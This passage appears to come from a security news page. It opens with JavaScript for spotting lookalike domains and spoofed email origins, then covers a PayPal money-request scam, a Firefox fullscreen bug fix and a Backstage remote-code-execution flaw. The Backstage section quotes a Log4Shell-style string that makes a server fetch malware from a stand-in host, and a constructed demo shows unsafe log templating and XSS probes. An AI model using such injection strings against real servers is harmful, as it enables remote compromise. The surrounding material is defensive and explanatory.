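// Deliberately tiny stand-in for the public-suffix list (assumption).
const SUFFIXES = ['co.uk', 'com', 'net', 'example'];

// Registrable domain = public suffix plus one label, read from the right-hand
// end, which is the part that actually determines who owns the site.
function registrableDomain(host) {
  const labels = host.toLowerCase().replace(/\.$/, '').split('.');
  for (const suffix of SUFFIXES) {
    const sl = suffix.split('.');
    if (labels.length > sl.length &&
        labels.slice(-sl.length).join('.') === suffix) {
      return labels.slice(-(sl.length + 1)).join('.');
    }
  }
  return labels.slice(-2).join('.');
}

// Fold the two substitutions the article describes: VV for W and capital I
// for lowercase l, so "paypaI.com" compares equal to "paypal.com".
function foldLookalikes(host) {
  return host.replace(/VV/g, 'W').replace(/vv/g, 'w')
             .replace(/I/g, 'l').toLowerCase();
}

// Decide whether a brand name in a host actually sits in the owning position.
function classifyHost(host) {
  const folded = foldLookalikes(host);
  const reg = registrableDomain(folded);
  const owner = reg.split('.')[0];
  const brand = BRANDS.find(b => folded.includes(b));
  if (!brand) return { host, registrable: reg, verdict: 'no-brand' };
  if (owner === brand) {
    // Same owner only after folding lookalikes means the raw name was a fake.
    const genuine = reg === registrableDomain(host.toLowerCase());
    return { host, registrable: reg, verdict: genuine ? 'brand-owned' : 'lookalike' };
  }
  return { host, registrable: reg, verdict: 'brand-not-owner' };
}

// Split the header block of a raw message into unfolded name/value pairs.
function parseHeaders(raw) {
  const lines = raw.split(/\r?\n\r?\n/)[0].split(/\r?\n/);
  const unfolded = [];
  for (const line of lines) {
    if (/^[ \t]/.test(line) && unfolded.length) {
      unfolded[unfolded.length - 1] += ' ' + line.trim();
    } else {
      unfolded.push(line);
    }
  }
  return unfolded.map(l => {
    const i = l.indexOf(':');
    return { name: l.slice(0, i).toLowerCase(), value: l.slice(i + 1).trim() };
  });
}

// The From: line is just message content; each relay prepends a Received:
// line, so the bottom-most Received: names the server that injected the mail.
// A mismatch is a signal worth looking at, not proof on its own, because
// legitimate bulk mail is often sent via third-party servers.
function originCheck(raw) {
  const hdrs = parseHeaders(raw);
  const from = hdrs.find(h => h.name === 'from');
  const received = hdrs.filter(h => h.name === 'received');
  const fromDomain = (from.value.match(/@([\w.-]+)/) || [])[1].toLowerCase();
  const firstHop = received[received.length - 1];
  const originHost = (firstHop.value.match(/^from\s+([\w.-]+)/i) || [])[1].toLowerCase();
  const consistent = registrableDomain(fromDomain) === registrableDomain(originHost);
  return { fromDomain, originHost, consistent };
}

// Constructed sample: a "PayPal" From: line on mail injected by another host.
const SAMPLE_SPOOF = [
  'Received: from mx.example (mx.example [192.0.2.10])',
  '\tby inbound.example; Thu, 17 Nov 2022 10:00:00 +0000',
  'Received: from mail.bogus.example (unknown [198.51.100.7])',
  '\tby mx.example; Thu, 17 Nov 2022 09:59:58 +0000',
  'From: "PayPal Service" <service@paypal.com>',
  'Subject: Money request',
  '',
  'You have a payment request.',
].join('\r\n');

for (const h of ['www.paypal.com', 'paypal.com.bogus.example', 'paypaI.com']) {
  console.log(classifyHost(h));
}
console.log(originCheck(SAMPLE_SPOOF));
```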

Email scammers therefore often go out of their way to ensure that their first contact with potential victims involves messages that really do come from genuine sites or online services, and that link to servers that really are run by those same legitimate sites…

…as long as the scammers can come up with some way of maintaining contact after that initial message, in order to keep the scam going.

Romance scammers, who try to lure victims into fake online relationships in order to sweet-talk them out of money, know this trick only too well. They typically start by making contact in a conventional way on a genuine dating site, using someone else’s photos and online identity. There, they charm their victims into leaving the comparative safety of the legitimate site and switching to an unsupervised one-to-one instant messaging service.

The “money request” scam

Here’s how the PayPal “money request” scam works:

  • The scammer creates a PayPal account and uses PayPal’s “money request” service to send you an official PayPal email asking you to send them some funds. Friends can use this service as an informal but relatively safe way of splitting expenses after a night out, asking for help paying a bill, or even to get paid for small tasks such as cleaning, gardening, pet sitting, and so on.
  • The scammer makes the request look like an existing charge for a genuine product or service, though not one you actually ordered, and probably for what looks like an unlikely or unreasonable price.
  • The scammer adds a contact phone number into the message, apparently offering an easy way to cancel the payment request if you think it’s a scam.

So the email actually does originate from PayPal, giving it an air of authenticity, and entices you to react by phoning the crooks back, rather than by replying to the email itself.

Like this:

In this example, the product you’re supposed to have purchased is the name of a genuine consumer anti-virus program, with the number 365 tacked on the end to give it the look of an online-only cloud-based product.

Given that you are quite well aware that the payment request was never authorised by you, you may well report it to PayPal…

…but it’s also tempting to phone the “business” that put through the request to tell them not to hit you up again next week or next month when their “records” show that the “bill” still hasn’t been paid.

After all, the phone call’s free (in the UK, as in many other countries, the -800- dialling code denotes a toll-free call), and if someone you know really has tried to buy some online cybersecurity software and charge it to your dime, why not try to get to the bottom of it and stop the “payment” getting through?

Of course, it’s all a pack of lies: there’s no anti-virus program; there was no purchase; and no one actually paid out £550 to anyone for anything.

The crooks have simply found a way to abuse PayPal’s free Money Request service to generate emails that really do come from PayPal, that include real PayPal links, and that use the message field in the request to give you an official-looking way to contact them directly…

…just like a romance scammer schmoozing you at arm’s length on a dating site, and then convincing you to switch over to messaging them directly, where the dating platform can no longer supervise or regulate your interactions.

What to do?

The quickest and easiest thing to do, of course, is nothing!

PayPal money requests are exactly what they say: a way for friends, family, someone, anyone, to invite you to send them money in a reasonably secure way.

They aren’t invoices; they aren’t payment demands; they’re not receipts; and they are unrelated to any existing purchase you did or didn’t make via PayPal or anywhere else.

If you simply do nothing, then nothing gets paid out and no one receives anything, so the scam fails.

We nevertheless recommend that you report bogus requests of this sort to PayPal, which will help to get the offending account closed down and to ensure that no one else either pays up through fear or calls the given phone number “just in case”.

Whatever you do, don’t send any money, and definitely don’t call the criminals back, because their true goal is to establish direct contact so they can start working you over to trick you into revealing personal information that could ultimately cost you a lot more than £549.67.

Should you tell the authorities?

Whether it’s during Black Friday season or at any other time of the year, we urge you to consider reporting scams of this sort to the relevant regulator or investigatory body in your country.

It might not feel as though you’re doing much to help, and you probably don’t have the time to report each and every one, but if sufficiently many people do provide some evidence to the authorities, there is at least a chance that they will do something about it.

On the other hand, if no one says anything, then nothing will or can be done.

Below, we’ve listed scam reporting links for various Anglophone countries:

  • AU: Scamwatch (Australian Competition and Consumer Commission) https://www.scamwatch.gov.au/about-scamwatch/contact-us
  • CA: Canadian Anti-Fraud Centre https://antifraudcentre-centreantifraude.ca/index-eng.htm
  • NZ: Consumer Protection (Ministry of Business, Innovation and Employment) https://www.consumerprotection.govt.nz/general-help/scamwatch/scammed-take-action/
  • UK: ActionFraud (National Fraud and Cyber Crime Reporting Centre) https://www.actionfraud.police.uk/
  • US: ReportFraud.ftc.gov (Federal Trade Commission) https://reportfraud.ftc.gov/
  • ZA: Financial Intelligence Centre https://www.fic.gov.za/Resources/Pages/ScamsAwareness.aspx

Firefox fixes fullscreen fakery flaw – get the update now!

Firefox’s latest once-every-four-weeks security update is out, bringing the popular alternative browser to version 107.0, or Extended Support Release (ESR) 102.5 if you prefer not to get new feature releases every month.

(As we’ve explained before, the ESR version number tells you which feature set you have, plus the number of times it’s had security updates since then, which you can reconcile this month by noticing that 102+5 = 107.)

Fortunately, there are no zero-day patches this time – all the vulnerabilities on the fix-list were either responsibly disclosed by external researchers, or found by Mozilla’s own bug hunting team and tools.

Font entanglement

The highest severity level is High, which applies to seven different bugs, four of which are memory mismanagement flaws that could lead to a program crash, including CVE-2022-45407, which an attacker could exploit by loading a font file.

Most bugs relating to font file usage are caused by the fact that font files are complex binary data structures, and there are many different file formats that products are expected to support.

This means that font-related vulnerabilities usually involve feeding a deliberately booby-trapped font file into the browser so that it goes wrong trying to process it.

But this bug is different, because an attacker could use a legitimate, correctly-formed font file to trigger a crash.

The bug can be triggered not by content but by timing: when two or more fonts are loaded at the same time by separate background threads of execution, the browser may mix up the fonts it’s processing, potentially putting data chunk X from font A into the space allocated for data chunk Y from font B and thereby corrupting memory.

Mozilla describes this as a “potentially exploitable crash”, although there is no suggestion that anyone, let alone an attacker, has yet figured out how to build such an exploit.

Fullscreen considered harmful

The most interesting bug, at least in our opinion, is CVE-2022-45404, described succinctly simply as a “fullscreen notification bypass”.

If you’re wondering why a bug of this sort would justify a severity level of High, it’s because giving control over every pixel on the screen to a browser window that is populated and controlled by untrusted HTML, CSS and JavaScript…

…would be surprisingly handy for any treacherous website operators out there.

We’ve written before about so-called Browser-in-the-Browser, or BitB, attacks, where cybercriminals create a browser popup that matches the look and feel of an operating system window, thus providing a believable way of tricking you into trusting something like a password prompt by passing it off as a security intervention by the system itself:

One way to spot BitB tricks is to try dragging a popup you’re not sure about out of the browser’s own window.

If the popup remains corralled inside the browser, so you can’t move it to a spot of its own on the screen, then it’s obviously just part of the web page you’re looking at, rather than a genuine popup generated by the system itself.

But if a web page of external content can take over the entire display automatically without provoking a warning beforehand, you might very well not realise that nothing you see can be trusted, no matter how realistic it looks.

Sneaky crooks, for example, could paint a fake operating system popup inside a fake browser window, so that you could indeed drag the “system” dialog anywhere on the screen and convince yourself it was the real deal.

Or the crooks could deliberately display the latest pictorial background (one of those Like what you see? images) chosen by Windows for the login screen, thus providing a measure of visual familiarity, and thereby trick you into thinking that you had inadvertently locked the screen and needed to reauthenticate to get back in.

We’ve deliberately mapped the otherwise unused but easy-to-find PrtSc key on our Linux laptop to lock the screen instantly, reinterpreting it as a handy Protect Screen button instead of Print Screen. This means we can reliably and rapidly lock the computer with a thumb-tap every time we walk or turn away, no matter how briefly. We don’t press it unintentionally very often, but it does happen from time to time.

What to do?

Check that you’re up to date, which is a simple matter on a laptop or desktop computer: Help > About Firefox (or Apple Menu > About) will do the trick, popping up a dialog that tells you if you are current or not, and offering to get the latest version if there’s a new one you haven’t downloaded yet.

On mobile devices, check with the app for the software marketplace you use (e.g. Google Play on Android and the Apple App Store on iOS) for updates.

(On Linux and the BSDs, you may have a Firefox build that is provided by your distro; if so, check with your distro maintainer for the latest version.)

Remember, even if you have automatic updating turned on and it usually works reliably, it’s worth checking anyway, given that it only takes a few seconds to make sure nothing went wrong and left you unprotected after all.


Log4Shell-like code execution hole in popular Backstage dev tool

Researchers at cloud coding security company Oxeye have written up a critical bug that they recently discovered in the popular cloud development toolkit Backstage.

Their report includes an explanation of how the bug works, plus proof-of-concept (PoC) code showing how to exploit it.

Backstage is what’s known as a cloud developer portal – a sort of business logic backend that makes it easy to build web-based APIs (application programming interfaces) to allow coders inside and outside your business to interact with your online services.

In the words of the project itself, originally created at Spotify but now open-sourced on GitHub:

Backstage is an open platform for building developer portals. Powered by a centralized software catalog, Backstage restores order to your microservices and infrastructure and enables your product teams to ship high-quality code quickly — without compromising autonomy.

Backstage unifies all your infrastructure tooling, services, and documentation to create a streamlined development environment from end to end.

No, we don’t truly know what that means, either, but we do know that the toolkit is written in JavaScript, runs using the server-side JavaScript system node.js, and draws in a web of supply chain dependencies from the NPM ecosystem.

NPM is short for Node Package Manager, an automated toolkit for ensuring that your back-end JavaScript code can easily make use of a wide range of open source libraries that provide popular, pre-written helper tools for everything from cryptography and database management to logging and version control.

Remote code execution

Unfortunately, the bug disclosed today, if unpatched, could give unauthenticated outsiders (loosely, anyone who can make API connections to your servers) a way to trigger remote code execution (RCE) inside the business-logic servers on your network.

Fortunately, however, if we have interpreted Oxeye’s writeup correctly, the attack they describe for their Backstage RCE depends on a sequence of coding flaws that ultimately depend on a specific bug, designated CVE-2022-36067, in a supply-chain component that Backstage relies on called vm2.

In case you’re wondering, vm2 is a general-purpose NPM module that implements a “virtual machine sandbox” that aims to make potentially risky JavaScript a bit safer to run on your servers.

That CVE-2022-36067 bug in vm2 was reported back in August 2022 by Oxeye itself (who gave it a PR-friendly name of “Sandbreak”, because it broke out of the sandbox), and patched promptly by the vm2 team almost three months ago.

So, as far as we can see, if you’re a Backstage user you will want to make sure that you have patched all at-risk components in your Backstage setup…

…but if you patched the vm2 component that was vulnerable to Sandbreak all those months ago, then it seems you aren’t directly vulnerable to the exploit described in Oxeye’s latest disclosure.

Also, if your Backstage servers are configured as good cybersecurity guidelines would suggest, with authentication required at both the network edge and inside the network, you won’t be at risk of random “for researcher purposes only” probes from “helpful” individuals determined to show that they are interested in cyberthreat “research”.

An “Emmenthal cheese” attack

Simply put, the newly disclosed security problems are the side-effect of a series of security issues, like holes in slices of Emmenthal cheese that could be permeated in sequence if an attacker is able to line up at least one hole on each slice.

As we understand it, Backstage includes a component called Scaffolder, which, as the name suggests, helps you to manage the various addons (known as plugins) that your developer community might want or need.

Scaffolder, in turn, makes use of a message logging system from Mozilla known as Nunjucks, which includes what’s known as string templating in node.js circles, as string interpolation in the Java world, and as string substitution to sysadmins who use command shells such as Bash.

If string interpolation rings a bell, it’s probably because it lay at the heart of the Log4Shell vulnerability back in December 2021, and of the Follina bug in the middle of 2022.

It’s where you get to rewrite the contents of a logging message based on special “coding characters” in a string template, so that a string such as $USER might be replaced with the account name being used by the server, or ${PID} might retrieve the current process ID.

In the extreme case of Log4Shell, the curious looking incantation ${jndi:ldap://example.com:8888/malware} could directly trick the server into downloading a program called malware from example.com and silently running it in the background.

In other words, you need to make absolutely certain that data arriving from an untrusted source, such as an outside user, is never passed blindly into a string templating or string interpolation function to be used as the template text itself.

If a remote user, for instance, tries to trick your server by giving their username as ${{RISKY}} (assuming the templating library uses ${{...}} as its special marker), you need to ensure that your logging code will correctly record that naughty-looking text literally as it was received…

…rather than allowing the text being logged to take control over the logging function itself!

In the words of an old nursery rhyme, you need to ensure that you don’t end up singing, “There’s a hole in my ${{BUCKET}}, dear Liza, dear Liza, there’s a hole in my ${{BUCKET}}, dear Liza. A hole!”

Wrapped in a safety blanket

To be fair, the perhaps-too-powerful templating/interpolation functionality of Nunjucks is wrapped by Backstage inside yet another supply-chain component, namely the aforementioned sandboxing system vm2, which is supposed to restrict the danger that a malicious user could do with booby-trapped input data.

Unfortunately, Oxeye researchers were able to pair their newly-discovered string templating code-triggering paths in Backstage + Scaffolder + Nunjucks with the older CVE-2022-36067 vulnerability in the vm2 security wrapper in order to achieve potential remote code execution on a Backstage server.

What to do?

If you’re a Backstage user:

  • Ensure you have the latest versions of Backstage and its dependencies, including the plugin-scaffolder-backend component. According to Oxeye, the relevant bugs in the Backstage code were patched by 01 September 2022, so that any official point release after that date should include the fixes. At the time of writing [2022-11-1T16:00Z], that includes Backstage 1.6.0, 1.7.0 and 1.8.0, released on 2022-09-21, 2022-10-18, and 2022-11-15 respectively.
  • Check that your Backstage installation has authentication configured as you expect. Oxeye claims that authentication is off by default, and that after following the Backstage guidelines, backend servers (which are probably not supposed to be exposed externally anyway) still allowed unauthenticated access. That may be what you want, but we recommend using this issue as a reason to check that your setup matches your intentions.
  • Check which parts of your Backstage infrastructure can be reached from the internet. Once again, use this issue as a reason to scan your own network from the outside if you haven’t done so recently.

If you are a node.js/NPM user:

  • Ensure you have the latest version of the vm2 sandbox component. You may have this installed as a dependency of other software you use, even if you don’t have Backstage. The CVE-2022-36067 vulnerability was patched on 2022-08-28, so you want vm2 version 3.9.11 or later.

If you are a programmer:

  • Be as defensive as you can when calling powerful logging functions. If you use a logging service (including Nunjucks or Log4J) that includes powerful templating/interpolation features, turn off any features you don’t need so that they can’t be exploited by mistake. Ensure that untrusted input is never itself used as a template, thus preventing attackers from rolling their own directly dangerous input strings.
  • Regardless of any other precautions in place, sanitise your logging inputs and outputs. Remember that someone else will need to open your logfiles in the future. Don’t allow any inadvertent booby-traps to get written into your logfile where they could cause trouble later on, such as HTML fragments with script tags left in. (Someone might open the file in a browser by mistake.)
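To show the difference between the unsafe and safe patterns described in the string templating section above, together with the sanitisation advice in the list just before this, here is an added JavaScript example with a deliberately tiny ${{NAME}} interpolator standing in for Nunjucks. It is not Backstage’s, Nunjucks’ or the article’s code; the marker syntax, the variable table and the sample inputs are assumptions made for the demo.

```javascript
// Added example, not Backstage's, Nunjucks' or the article's code. The marker
// syntax ${{NAME}} and the variable table are constructed for the demo.
const TEMPLATE_VARS = {
  USER: 'svc-backstage',               // constructed values
  PID: '4242',
  SECRET: 'db-password-placeholder',   // something a log line must never expand
};

const MARKER = /\$\{\{\s*([A-Z_]+)\s*\}\}/g;

// Expand every ${{NAME}} marker found in the template text. Unknown names are
// left as-is. Because the replacement is produced by a callback, the inserted
// text is never re-scanned for markers.
function render(template, vars = TEMPLATE_VARS) {
  return template.replace(MARKER, (m, name) =>
    Object.prototype.hasOwnProperty.call(vars, name) ? vars[name] : m);
}

// Escape HTML-significant characters and control characters so that a stored
// log line cannot smuggle script tags or forged line breaks into a log viewer.
function sanitizeForLog(s) {
  const html = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s)
    .replace(/[&<>"']/g, c => html[c])
    .replace(/[\x00-\x1f\x7f]/g,
             c => '\\x' + c.charCodeAt(0).toString(16).padStart(2, '0'));
}

// VULNERABLE pattern (the Log4Shell-style mistake): the untrusted value is
// concatenated into the template *before* rendering, so markers the remote
// user typed into their username are honoured by the logger.
function logUnsafe(username) {
  return render('[${{USER}}/${{PID}}] login failed for ' + username);
}

// SAFE pattern: the template is a fixed string the programmer wrote, and the
// untrusted value arrives only as a context variable, already sanitised, so
// "${{SECRET}}" is recorded literally rather than expanded.
function logSafe(username) {
  return render('[${{USER}}/${{PID}}] login failed for ${{NAME}}',
                { ...TEMPLATE_VARS, NAME: sanitizeForLog(username) });
}

// Constructed attacker-style inputs: a marker, and an HTML fragment.
const PROBES = ['${{SECRET}}', '${{RISKY}}', '<script>alert(1)</script>'];
for (const p of PROBES) {
  console.log('unsafe:', logUnsafe(p));
  console.log('safe:  ', logSafe(p));
}
```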

Even when you receive input from a trusted source, there’s rarely any reason not to put it through your own sanitisation checks before you use it.

(You may occasionally justify an exception, for example for performance reasons, but it should be an exception, not the rule.)

Firstly, checking again helps you spot errors that previous coders may have made in good faith; secondly, it helps to limit the spread of bad or booby-trapped data if some other part of your ecosystem gets compromised.

The thing about those slices of Emmenthal cheese we mentioned earlier on is that although they’re permeable if at least one hole lines up on every sheet…

…they’re impermeable if there’s at least one sheet with holes that don’t line up at all!
